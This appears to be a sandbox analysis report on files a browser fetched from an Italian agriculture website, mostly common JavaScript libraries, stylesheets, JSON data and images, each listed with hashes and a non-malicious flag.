                                                                                                                                          Preview:/*!. * Bootstrap v4.0.0 (https://getbootstrap.com). * Copyright 2011-2018 The Bootstrap Authors (https://github.com/twbs/bootstrap/graphs/contributors). * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */.!function(t,e){"object"==typeof exports&&"undefined"!=typeof module?e(exports,require("jquery"),require("popper.js")):"function"==typeof define&&define.amd?define(["exports","jquery","popper.js"],e):e(t.bootstrap={},t.jQuery,t.Popper)}(this,function(t,e,n){"use strict";function i(t,e){for(var n=0;n<e.length;n++){var i=e[n];i.enumerable=i.enumerable||!1,i.configurable=!0,"value"in i&&(i.writable=!0),Object.defineProperty(t,i.key,i)}}function s(t,e,n){return e&&i(t.prototype,e),n&&i(t,n),t}function r(){return(r=Object.assign||function(t){for(var e=1;e<arguments.length;e++){var n=arguments[e];for(var i in n)Object.prototype.hasOwnProperty.call(n,i)&&(t[i]=n[i])}return t}).apply(this,arguments)}e=e&&e.hasOwnProperty("default")?e.default:e,n=n&&n.hasOwnProp
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):127200
                                                                                                                                          Entropy (8bit):5.339889537935314
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:ji6QC5Igc81k2dvaQggTsnFDg7RJJlwMnF26g36BiDrmLAsBN5t1k:m9gJ1k2rJX2F8A8N6
                                                                                                                                          MD5:DD9377E8833CE1E98FCE9E03BB37FCD5
                                                                                                                                          SHA1:61643141D6CAEAE0097AB2CD465B2F2ABE62D3B0
                                                                                                                                          SHA-256:9A5BA6F2869C06CC803240CA13266CBDBFFDA2EC9096CCDF86C2840F61B20BDE
                                                                                                                                          SHA-512:CD43309831F2D8A695294161F330F54F7974B3E95DB505CE570B350A76CFDBCE9AB1D3D8C173F54DB90386D372690D2BC3FC9E99CED0E7A9D02F793EB3F86D47
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://www.agriparadigma.it/wp-content/themes/tentamus/assets/scripts/amcharts4/maps.js
                                                                                                                                          Preview:am4internal_webpackJsonp(["cc1e"],{QJ7E:function(t,e,n){"use strict";Object.defineProperty(e,"__esModule",{value:!0});var i={};n.d(i,"geoArea",function(){return st}),n.d(i,"geoBounds",function(){return te}),n.d(i,"geoCentroid",function(){return pe}),n.d(i,"geoCircle",function(){return Me}),n.d(i,"geoClipAntimeridian",function(){return Ve}),n.d(i,"geoClipCircle",function(){return Re}),n.d(i,"geoClipExtent",function(){return Ye}),n.d(i,"geoClipRectangle",function(){return He}),n.d(i,"geoContains",function(){return fn}),n.d(i,"geoDistance",function(){return rn}),n.d(i,"geoGraticule",function(){return vn}),n.d(i,"geoGraticule10",function(){return mn}),n.d(i,"geoInterpolate",function(){return _n}),n.d(i,"geoLength",function(){return tn}),n.d(i,"geoPath",function(){return Pi}),n.d(i,"geoAlbers",function(){return Vi}),n.d(i,"geoAlbersUsa",function(){return Ri}),n.d(i,"geoAzimuthalEqualArea",function(){return Hi}),n.d(i,"geoAzimuthalEqualAreaRaw",function(){return Wi}),n.d(i,"geoAzimuthalEquid
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):2859
                                                                                                                                          Entropy (8bit):5.128976775297061
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:48:HrjSTxswDB/P7LUS0BvpKkR2/HSXmpgMPnfFrYHe1rcYlX3orrkwEv4Hm6Hid:HC+2/Vpb/flue1pFwEv4Hmo0
                                                                                                                                          MD5:0E4A098F3F6E3FAEDE64DB8B9DA80BA2
                                                                                                                                          SHA1:65B9B3C849F3FBDD783DDBFB183616FF55C7EE53
                                                                                                                                          SHA-256:AB21762C3F447AA08CBEFD5EA3866165F925BD5058A9AE19E23721462DE6FB60
                                                                                                                                          SHA-512:47CF04B377C4D5D512EE93439D17D21F6E0C5011E3CDC9EBE2835C91B6BFE7D5B3E4E23DD8C00017D7B235D08A8524A103EDF3A199C8B1D5CB9A182D8D5EAE73
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://www.agriparadigma.it/wp-content/plugins/contact-form-7/includes/css/styles.css?ver=5.7.7
                                                                                                                                          Preview:.wpcf7 .screen-reader-response {..position: absolute;..overflow: hidden;..clip: rect(1px, 1px, 1px, 1px);..clip-path: inset(50%);..height: 1px;..width: 1px;..margin: -1px;..padding: 0;..border: 0;..word-wrap: normal !important;.}...wpcf7 form .wpcf7-response-output {..margin: 2em 0.5em 1em;..padding: 0.2em 1em;..border: 2px solid #00a0d2; /* Blue */.}...wpcf7 form.init .wpcf7-response-output,..wpcf7 form.resetting .wpcf7-response-output,..wpcf7 form.submitting .wpcf7-response-output {..display: none;.}...wpcf7 form.sent .wpcf7-response-output {..border-color: #46b450; /* Green */.}...wpcf7 form.failed .wpcf7-response-output,..wpcf7 form.aborted .wpcf7-response-output {..border-color: #dc3232; /* Red */.}...wpcf7 form.spam .wpcf7-response-output {..border-color: #f56e28; /* Orange */.}...wpcf7 form.invalid .wpcf7-response-output,..wpcf7 form.unaccepted .wpcf7-response-output,..wpcf7 form.payment-required .wpcf7-response-output {..border-color: #ffb900; /* Yellow */.}...wpcf7-form-contro
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):514046
                                                                                                                                          Entropy (8bit):5.33603464169984
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6144:yLNfj0D+emNTHQLcLiUdc9sahLfe4mNUGDKWoju+uk1ojL0dE9Tho2qBf5EMnui:yLJemNELcLiUdRKm+ukojL0dpH
                                                                                                                                          MD5:CA383FD3A8075807DF55FED12C3EB5FD
                                                                                                                                          SHA1:D1C84E76188DE600F9F2C1B06428268FE15A624D
                                                                                                                                          SHA-256:2403A6DB6C32A06CBE7D7665CCD56B597E34FA9CD8EFD8C22B99D06AC926F153
                                                                                                                                          SHA-512:A2AEFD0E0D6D72E3DC0972FBA6EAEBABE834E3461F04E406C8B6F19E4DA0DCDB083E0C358ADA0DF8B4B238913B81626A67E7F497516C05E04CEDB292D89F16B5
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://www.agriparadigma.it/wp-content/plugins/lab-finder/labs.json?v=1732789978972
                                                                                                                                          Preview:[{"id":5,"name":"L.A.B.","url":"https://www.lab-sl.com","web":"lab-sl.com","contact":"Juan Ramirez Cassinello | +34 672 385 863 | jramirez@lab-sl.com","lab_services":"","industries":"","special_services":"","industry":["*",5,1,3],"service":["*",3,2,1],"lang":"es_ES","related":{"en_US":55},"options":{"adress":"<p><span>C/Albert Einstein, 7,\u00a0</span><span>(PITA)<br />\nAutovia del Mediterr\u00e1neo (A7)<br />\nSalida 460, 04131 Almer\u00eda, Spain<br />\n</span></p>\n<p>Phone: +34 950 259 057</p>\n<p><span>\u00a0</span></p>\n","background_color":"#006342","body_start_option":" Google Tag Manager (noscript) -->\r\n<iframe src=\"https://www.googletagmanager.com/ns.html?id=GTM-5Z8C9WN\" height=\"0\" width=\"0\"></iframe>\r\n End Google Tag Manager (noscript) -->","breadcrumb":false,"city":"Almer\u00eda","city_copiar":"Almer\u00eda","coming_soon":false,"contact":"Juan Ramirez Cassinello | +34 672 385 863 | jramirez@lab-sl.com","country":"es","custom_styles":"","description":"<h2
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):260
                                                                                                                                          Entropy (8bit):4.815060853409491
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:Y2iNAwNem0Lx2MALg98juOn5rh8juOG6MYmsQZ+:Y2J2Vg9ID5rhIDG6ldQA
                                                                                                                                          MD5:01EA56F7B4F96E453E136F7D8FAA0064
                                                                                                                                          SHA1:287C0EE9706E29601D71E22A39EF059D83B8984A
                                                                                                                                          SHA-256:43D1B1F17D844FC59FE2690B6FB70E63DE365D2E5DA0FFDE72E0C1D7F2F74356
                                                                                                                                          SHA-512:76124DEB4A941FBB8030131C60A62043B906154E76EE2E75AB9F3B575EC18109EDC1ABCA10BA619E4032703D197C5B8E6779748A22B7A238882D951FD25289DA
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://dns.google/resolve?name=agriparadigma.it&type=MX
                                                                                                                                          Preview:{"Status":0,"TC":false,"RD":true,"RA":true,"AD":false,"CD":false,"Question":[{"name":"agriparadigma.it.","type":15}],"Answer":[{"name":"agriparadigma.it.","type":15,"TTL":21600,"data":"10 mxpool.de2.hostedoffice.ag."}],"Comment":"Response from 212.25.160.10."}
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (63253)
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):145640
                                                                                                                                          Entropy (8bit):5.109175432921218
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:cJoyHBxCfhJrzjhIfm7GdccCUaZAkjk+VkDeqf2jJDY/cyr+KZK3Iacfx1Uz6J+Z:9JRIu7uccCUOxjlY/cyrtayUz6J1jJvI
                                                                                                                                          MD5:39C56198F724E15F05F7E8CF71D4D982
                                                                                                                                          SHA1:E81768436DD686AD39B20F636BE435DD79C667A9
                                                                                                                                          SHA-256:A570DE200214730AA89D01C1C2D820D260CEF85676F7296940E94B646138F6E6
                                                                                                                                          SHA-512:E6EF337CB4650AE79EEB4D827006947F4C686BE1604CDB5F79B007D54428A39B8045209942327C5A38112109AE40F3BD536A06A7FF67FAC35C008531A8BFF195
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://www.agriparadigma.it/wp-content/themes/tentamus/dist/styles/main.css?ver=2001211040
                                                                                                                                          Preview:@charset "UTF-8";./*!. * Bootstrap v4.0.0-alpha.4 (http://getbootstrap.com). * Copyright 2011-2016 The Bootstrap Authors. * Copyright 2011-2016 Twitter, Inc.. * Licensed under MIT (https://github.com/twbs/bootstrap/blob/master/LICENSE). */./*! normalize.css v4.0.0 | MIT License | github.com/necolas/normalize.css */.html{font-family:sans-serif;-ms-text-size-adjust:100%;-webkit-text-size-adjust:100%}body{margin:0}article,aside,details,figcaption,figure,footer,header,main,menu,nav,section,summary{display:block}audio,canvas,progress,video{display:inline-block}audio:not([controls]){display:none;height:0}progress{vertical-align:baseline}[hidden],template{display:none}a{background-color:transparent}a:active,a:hover{outline-width:0}abbr[title]{border-bottom:none;text-decoration:underline;text-decoration:underline dotted}b,strong{font-weight:inherit;font-weight:bolder}dfn{font-style:italic}h1{font-size:2em;margin:.67em 0}mark{background-color:#ff0;color:#000}small{font-size:80%}sub,sup{font-siz
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (32012)
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):69597
                                                                                                                                          Entropy (8bit):5.369216080582935
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:qNhEyjjTikEJO4edXXe9J578go6MWX2xkjVe4c4j2ll2Ac7pK3F71QDU8CuT:Exc2yjq4j2uYnQDU8CuT
                                                                                                                                          MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                                                                                                                                          SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                                                                                                                                          SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                                                                                                                                          SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (28594), with no line terminators
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):28594
                                                                                                                                          Entropy (8bit):5.066241319479
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:DtE0qf5PD7l2Z/NEdjpVFtY1o/JHOJt2VLpa1bpgQTSzbbDAziqyHS4:+0k
                                                                                                                                          MD5:E5C4B448433C3DE65ACBF9A38AA6DA5A
                                                                                                                                          SHA1:F2FF86945C781653854E1200641799F40C5E0789
                                                                                                                                          SHA-256:6B4B6AB499050AC7D0F58CDAFD8AA5895CAA60484952C9C43B7AE0E9F96BF464
                                                                                                                                          SHA-512:1E3427EB8DE51F4676761C5869C486D4476D9F0FED7D78F04131A2BF4274E003200FADE9D96B66A757C64A9F627C2A630EDEAAEEDA3AC9C16D7A4BB726EFBEAE
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://www.agriparadigma.it/wp-content/plugins/tailor/assets/js/dist/frontend.min.js?ver=1.8.2
                                                                                                                                          Preview:(function e(t,n,r){function s(o,u){if(!n[o]){if(!t[o]){var a=typeof require=="function"&&require;if(!u&&a)return a(o,!0);if(i)return i(o,!0);var f=new Error("Cannot find module '"+o+"'");throw f.code="MODULE_NOT_FOUND",f}var l=n[o]={exports:{}};t[o][0].call(l.exports,function(e){var n=t[o][1][e];return s(n?n:e)},l,l.exports,e,t,n,r)}return n[o].exports}var i=typeof require=="function"&&require;for(var o=0;o<r.length;o++)s(r[o]);return s})({1:[function(require,module,exports){var $=window.jQuery;require("./shared/utility/polyfills/classlist");require("./shared/utility/polyfills/raf");require("./shared/utility/polyfills/transitions");var abstractComponent=require("./shared/components/ui/abstract");window.Tailor={Components:{create:function(prototype){var originalPrototype=prototype;var component=function(el,options,callbacks){abstractComponent.call(this,el,options,callbacks)};component.prototype=Object.create(abstractComponent.prototype);for(var key in originalPrototype){component.protot
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (18798)
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):18833
                                                                                                                                          Entropy (8bit):5.198890693042313
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:ivzwv2QYnTte0KKscI1WxUy/gdLzrXmJUDWjFkgoKjJj5Sh6W0+:WwOQ2te0KaYrXm1hR5Uz
                                                                                                                                          MD5:F88D5720BB454ED5D204CBDB56901F6B
                                                                                                                                          SHA1:F1952292FDE4B15936E9AAC16B2B9896684DB95B
                                                                                                                                          SHA-256:726B820E44F6AB90AD991D30A4BF26D3A5D71493CBCD1FB1EFD0D14E89B9DF2A
                                                                                                                                          SHA-512:F7E3EC0C5B832116D75CAC2A5A40AB6FE673CC6C0996BD898F25850ED5555484D821E1FC4CA039C69DA3AB51FAA25613D622DB1177D7CDE16DA477145C3A6E22
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://www.agriparadigma.it/wp-includes/js/underscore.min.js?ver=1.13.4
                                                                                                                                          Preview:/*! This file is auto-generated */.!function(n,r){var t,e;"object"==typeof exports&&"undefined"!=typeof module?module.exports=r():"function"==typeof define&&define.amd?define("underscore",r):(n="undefined"!=typeof globalThis?globalThis:n||self,t=n._,(e=n._=r()).noConflict=function(){return n._=t,e})}(this,function(){var n="1.13.6",r="object"==typeof self&&self.self===self&&self||"object"==typeof global&&global.global===global&&global||Function("return this")()||{},e=Array.prototype,F=Object.prototype,V="undefined"!=typeof Symbol?Symbol.prototype:null,P=e.push,f=e.slice,s=F.toString,q=F.hasOwnProperty,t="undefined"!=typeof ArrayBuffer,u="undefined"!=typeof DataView,U=Array.isArray,W=Object.keys,z=Object.create,L=t&&ArrayBuffer.isView,$=isNaN,C=isFinite,K=!{toString:null}.propertyIsEnumerable("toString"),J=["valueOf","isPrototypeOf","toString","propertyIsEnumerable","hasOwnProperty","toLocaleString"],G=Math.pow(2,53)-1;function l(u,o){return o=null==o?u.length-1:+o,function(){for(var n=M
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:JSON data
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):321
                                                                                                                                          Entropy (8bit):4.982434990202744
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:6:kX639/gIJAuuuthkP//f4IoWzqs4jW1CRW35jY:kEBgIOuHhA/XvoPPWV5k
                                                                                                                                          MD5:6B7A647D1B9880C6686665F8D0AE141A
                                                                                                                                          SHA1:656E4724C547D3E5CEE34DF5D845EE4EA2FE6BE1
                                                                                                                                          SHA-256:24EE2A6B42F33AE6D67EFCD03BEC7C1A337E5226064AD6026878AA08AF2CDFAB
                                                                                                                                          SHA-512:85318BF359EC14F8D254988C99D250B9E3C36494E73078B97A47E886B6548E477531C88D78E38FB106E46724F24C134571B602FDEC6B1051E32B5FC917F8A1D1
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:{. "ip": "8.46.123.228",. "hostname": "static-cpe-8-46-123-228.centurylink.com",. "city": "New York City",. "region": "New York",. "country": "US",. "loc": "40.7143,-74.0060",. "org": "AS3356 Level 3 Parent, LLC",. "postal": "10001",. "timezone": "America/New_York",. "readme": "https://ipinfo.io/missingauth".}
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:PNG image data, 128 x 128, 8-bit/color RGB, non-interlaced
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):12647
                                                                                                                                          Entropy (8bit):7.976805859641904
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:CcKRdsJhDbU4E9IMG9I0KY7Y6zoc/X1OQwy+:CldAnU69IZYFzJ8QT+
                                                                                                                                          MD5:28E056AF563E5A6599BBACBEA53A3D11
                                                                                                                                          SHA1:B7FA01CADC94C44F4BA12143F9B8D299C3B7F0A7
                                                                                                                                          SHA-256:F45D81F6FC4A9AF7B5477563D89492394AC5008AF3AF8BCEF72CC9D7DC77757B
                                                                                                                                          SHA-512:0EE4523CCE082AAD25AEF8D4ADC1AF0AE7777A10B20714B729B4D95A932E42975F39D97D952D392C19CB782B7A557103521403D064F25F3EB7313D8BF78B6DB8
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://logo.clearbit.com/agriparadigma.it
                                                                                                                                          Preview:.PNG........IHDR.............L\....1.IDATx..}..]E..9Uu.}K.[:Ig.IB.I.a...,.,3*.3....3..(.2...~:. ... !$..d'..v....o..[u...u_71.L.;.7.._.~..u...?..3....8....N.g....3.....p.I.............0........P...h @.d.....@.~R".-0fD.^...<R.w...d.q8...#......S&.........~_mMM......Tw.._`2&..D,..c...y....)..^V^\\..$.()..-....Q............a{u...........n..D.Y!H.p.....DF.......` 8.T...v..?..w..........:.D...D.n..|.r....~k...V......(...1c....P@..hB........e..}y~N..m.....G.. .I/....+./.g]C[.6..C..2.V.d.E(..).).D..y.$.,P.PrQ.....+?..O.&.C...p..q..#...4.. .a...../3.T.Pr_....w..3"\..qe..........R...W}._..l..p...... .h......0.0....Z..._|....`......Pim.....e^.i3.~.k(.JJ{....C.........P\...Z..[w~o.O..y.....F....Q.]...'0...|.3.].'....:z..{ih. .9..1.7Wo....=.zY.n..4*......... D......grI.....d1[.s....@C...F.)..`.c.u.~q_kC.......5.C...~^...$c...r.gF..,b..t..G...\..=xd..P.....?>..%;.kDh.....Cg..U....l..........y....].9n"..G1........d.$.k;.~._<..P.P.n.....N...7.^..0...~8...@
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, progressive, precision 8, 250x250, components 3
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):27444
                                                                                                                                          Entropy (8bit):7.9804851002097745
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:768:JX5RhQC6cBibUP25b2I2SI/Fk48gru4sbrvFjV/Yn:JLhV6cgG25b2I2N/q41r1wrRC
                                                                                                                                          MD5:D6C752CE48DEA6596334795EDE83DC3A
                                                                                                                                          SHA1:4AE3FD12A119BD5BBCD9E655E16AF3BCB41C6294
                                                                                                                                          SHA-256:98893B6D0B185B3453331415A0367E13EB47A19043300AF295711C56E4D0ABB9
                                                                                                                                          SHA-512:8AFBE6BB95E39332007A746C8FAAFABB55D82F677FA7211269A93DE12CAA0A9F6CD02281CB2F7C042D1EE8EEB81C42CC6348DB3D9AF4E5CDCEBA91F6A75D4583
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://www.agriparadigma.it/wp-content/uploads/sites/71/2017/02/HeaderImage_0005_Agriculture.jpg
                                                                                                                                          Preview:......JFIF.............C....................................................................C..............................................................................................................................................................<.]...V..n..36..M%.mE.:.K..X...9AU.7#I...!..&....../y.0*.E.PR5.%:.....V...j.:N.4..Q..h..F..*......U..sV. ..T............J....KR.3.e...Z.rV..|.....9...p..@*j.a.];.Z.ne...zB.f......10.i...~...J..B.b.R.........`..v.2...9.......&X-j..bj...~N..S.,.....Ll....*..u..6...V...d...M.i]3...p..B.UP."....,..#.'y.r......X.Ty..H.D."!....E..f. ...6.Y....F.......9.]UGF....W.t...7>...a.....,.N.%..zR..V.R....lM`U.4 .*..D.;.h)...b ......b..&&%r...:.b.w+<...V...s..f.h...h.,...Y.[.X..g~s..UN.6z....r..mE7..(.Q-f'Ivx...r.[....Wp'6.N..{.:((.....)....+I.^....n..AS*..N...Xb.-t.?........z2.`I.9..X..z.zz<...F.|>..(...>wv.=...;..]..0.`...iE.....|...5f....{J....s._...g......o....Uk[\......._X.}SL.M|.S;.Pe.mX.s.s_.}?..P"..U..q-
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:HTML document, ASCII text, with very long lines (12943), with no line terminators
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):12943
                                                                                                                                          Entropy (8bit):5.197434517262163
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:384:Ie8sHDZ/J+oHewgOQGp/GJ3eYE3kfn3GVqv0s+pfYm03pYg:Ie8s1/J+oHlgOXhzYE3kf3wqv0s+pfYH
                                                                                                                                          MD5:5BC2B1FA970F9CECB3C30C0C92C98271
                                                                                                                                          SHA1:7C6BB87AAA24714B7B3B3C86DD932736A80270A9
                                                                                                                                          SHA-256:1060091178CBD6C843B802F516F230F1A3A1E85F1AFBD6EF84D80E5430BA457E
                                                                                                                                          SHA-512:1B39C7152E6561C6108A36E5B89A635CE1EF883EF683B4FB4E58D32BF2A7F415FB1DF4695562D2E8ACD85A3BF5933071294D5A1D162993930A5DC7851B9A5ED3
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://www.agriparadigma.it/wp-content/plugins/contact-form-7/includes/js/index.js?ver=5.7.7
                                                                                                                                          Preview:(()=>{"use strict";const e=e=>Math.abs(parseInt(e,10)),t=(e,t)=>{const a=new Map([["init","init"],["validation_failed","invalid"],["acceptance_missing","unaccepted"],["spam","spam"],["aborted","aborted"],["mail_sent","sent"],["mail_failed","failed"],["submitting","submitting"],["resetting","resetting"],["validating","validating"],["payment_required","payment-required"]]);a.has(t)&&(t=a.get(t)),Array.from(a.values()).includes(t)||(t=`custom-${t=(t=t.replace(/[^0-9a-z]+/i," ").trim()).replace(/\s+/,"-")}`);const n=e.getAttribute("data-status");return e.wpcf7.status=t,e.setAttribute("data-status",t),e.classList.add(t),n&&n!==t&&e.classList.remove(n),t},a=(e,t,a)=>{const n=new CustomEvent(`wpcf7${t}`,{bubbles:!0,detail:a});"string"==typeof e&&(e=document.querySelector(e)),e.dispatchEvent(n)},n=e=>{const{root:t,namespace:a="contact-form-7/v1"}=wpcf7.api;return r.reduceRight(((e,t)=>a=>t(a,e)),(e=>{let n,r,{url:o,path:c,endpoint:s,headers:i,body:l,data:d,...p}=e;"string"==typeof s&&(n=a.repl
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:ASCII text, with very long lines (32012)
                                                                                                                                          Category:downloaded
                                                                                                                                          Size (bytes):69597
                                                                                                                                          Entropy (8bit):5.369216080582935
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:1536:qNhEyjjTikEJO4edXXe9J578go6MWX2xkjVe4c4j2ll2Ac7pK3F71QDU8CuT:Exc2yjq4j2uYnQDU8CuT
                                                                                                                                          MD5:5F48FC77CAC90C4778FA24EC9C57F37D
                                                                                                                                          SHA1:9E89D1515BC4C371B86F4CB1002FD8E377C1829F
                                                                                                                                          SHA-256:9365920887B11B33A3DC4BA28A0F93951F200341263E3B9CEFD384798E4BE398
                                                                                                                                          SHA-512:CAB8C4AFA1D8E3A8B7856EE29AE92566D44CEEAD70C8D533F2C98A976D77D0E1D314719B5C6A473789D8C6B21EBB4B89A6B0EC2E1C9C618FB1437EBC77D3A269
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          URL:https://code.jquery.com/jquery-3.2.1.slim.min.js
                                                                                                                                          Preview:/*! jQuery v3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_evalUrl,-event/ajax,-effects,-effects/Tween,-effects/animatedSelector | (c) JS Foundation and other contributors | jquery.org/license */.!function(a,b){"use strict";"object"==typeof module&&"object"==typeof module.exports?module.exports=a.document?b(a,!0):function(a){if(!a.document)throw new Error("jQuery requires a window with a document");return b(a)}:b(a)}("undefined"!=typeof window?window:this,function(a,b){"use strict";var c=[],d=a.document,e=Object.getPrototypeOf,f=c.slice,g=c.concat,h=c.push,i=c.indexOf,j={},k=j.toString,l=j.hasOwnProperty,m=l.toString,n=m.call(Object),o={};function p(a,b){b=b||d;var c=b.createElement("script");c.text=a,b.head.appendChild(c).parentNode.removeChild(c)}var q="3.2.1 -ajax,-ajax/jsonp,-ajax/load,-ajax/parseXML,-ajax/script,-ajax/var/location,-ajax/var/nonce,-ajax/var/rquery,-ajax/xhr,-manipulation/_e
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
                                                                                                                                          File Type:JPEG image data, JFIF standard 1.01, aspect ratio, density 1x1, segment length 16, baseline, precision 8, 300x111, components 3
                                                                                                                                          Category:dropped
                                                                                                                                          Size (bytes):8887
                                                                                                                                          Entropy (8bit):7.929094937109068
                                                                                                                                          Encrypted:false
                                                                                                                                          SSDEEP:192:Iz743fPSpWVpH/NQjKFfEP6WIAa9AvtdeokV3:Iz7SfP+q1QjKA6sdeokZ
                                                                                                                                          MD5:5D0B53894B5144174959F16050107FCF
                                                                                                                                          SHA1:467A0DE1745E2136F87901A323AA9DBF38B91FA5
                                                                                                                                          SHA-256:C9046D7BB44221611231CBE078AFB27CD0244474BE1A4F13047F9FCD93536BB5
                                                                                                                                          SHA-512:21AE3BAA2E39CF2C1B27EF7C7136BD3075619CAF3E7AA008BB7D9421FBED634B70DE33EBF39AB2B2E0D0921C683DF10C1F32497C6BDDDAB91EEB8E0F4E708BB1
                                                                                                                                          Malicious:false
                                                                                                                                          Reputation:low
                                                                                                                                          Preview:......JFIF.............C....................................................................C.......................................................................o.,............................................C............................!1.".2ABQ..#3RSabq.7r..C....4cs.$u....................................?.........................!1Aa."2BQ....q...#4Rbr.........$3Cc.............?.....@.P(.....@.P(.....@.P(.....@.P(.....@.P(.....@.P(.....@.P(.....@.P(.....@.P(.....@.P(.....@.P(.....@.P(.....@.P(.....@.P(.....@.P(5.Ct..B.m2.E..m*#....0..H....mUm....@..<._q.......XO*8..L.d*d..|Kp..U"R-..._ea_.........M.Dp3.N.....?"......UQ.U67...Q.\.'.}...I.U@P(5}ms...q.:M....#b.9.T'W...pq.#Y/..H.......h.'./../....$..v....Wh...."..N..W...5W..L~..._...o.Z.n..<6.E.M......q...s...E.>.....Rz.*.f.%.[.I..g..^..].@.PDJ.:v..6..ra..E.....B.0.....e....}.i...K......b,i......d.j./q%J....~Kc.kW....N.O.V.2."..uL..J..=p.....qSi.U6......K.._Y.......YR...)..C.'.]v....%.....Q...#.D.)...Q...ohgmn.Kx
                                                                                                                                          Process:C:\Program Files\Google\Chrome\Application\chrome.exe
